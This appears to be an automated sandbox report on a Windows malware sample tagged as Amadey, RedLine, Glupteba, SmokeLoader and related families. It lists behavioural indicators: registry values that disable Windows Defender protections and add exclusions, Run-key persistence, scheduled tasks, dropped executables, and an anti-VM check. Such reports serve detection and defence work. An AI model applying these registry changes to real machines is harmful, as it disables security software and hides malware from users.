Malware Analysis Report

2025-01-23 11:00

Sample ID 231010-za6e6abe58
Target 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1
SHA256 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware trojan mystic lutyr magia stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1

Threat Level: Known bad

The file 19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware trojan mystic lutyr magia stealer

DcRat

RedLine

Windows security bypass

Glupteba payload

SmokeLoader

Healer

Mystic

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

RedLine payload

Modifies Windows Defender Real-time Protection settings

SectopRAT

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

Glupteba

Amadey

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:31

Reported

2023-10-10 20:46

Platform

win7-20230831-en

Max time kernel

76s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2436 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8FF1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9169.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\933E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B4B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\129F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1CAE.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1oS28ea9.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9B4B.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\96E7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WU8aU7xW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\sh6hE7ZX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ly3QD9BA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Hq4pv4zr.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\8EC8.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\bcdedit.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231010204433.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D5ACD161-67AD-11EE-9FC1-4E9D0FD57FD1} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconURLFallback = "http://www.bing.com/favicon.ico" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
